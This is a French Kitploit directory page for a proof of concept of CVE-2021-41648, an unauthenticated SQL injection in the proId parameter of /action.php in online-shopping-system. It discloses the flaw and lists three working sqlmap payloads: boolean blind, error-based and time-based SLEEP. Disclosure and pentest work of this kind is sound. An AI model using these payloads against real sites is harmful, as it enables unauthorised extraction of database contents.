Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mobiusbinary/cve-2021-41648
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

Preuve de concept d'exploitation pour une injection SQL non authentifiée dans online-shopping-system via le paramètre proId, permettant l'extraction de données depuis la base de données MySQL.

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41648

CVE-2021-41648 Injection SQL dans online-shopping-system

Le online-shopping-system est vulnérable aux attaques par injection SQL non authentifiées, de type aveugle booléenne/erreur et de type basé sur les erreurs.

Le paramètre proId de la page /action.php ne nettoie pas les entrées utilisateur ; un attaquant peut extraire des données sensibles de la base de données MySQL sous-jacente.

Lien vers l'application

online-shopping-system

Composants et paramètres concernés

URL : /action.php
PARAMÈTRE : proId

PoC

Payloads SQLMAP

Paramètre proId sur la page /action.php

Paramètre : proId (POST) Type : boolean-based blind Titre : OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload : proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Type : error-based Titre : MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload : proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Type : time-based blind Titre : MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload : proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Si l'image du PoC n'est pas claire, veuillez cliquer sur le GIF qui se chargera dans une meilleure résolution.

POC - proId

Découvert par

Jason Colyvas
MOBIUSBINARY
21 septembre 2021

Télécharger l’outil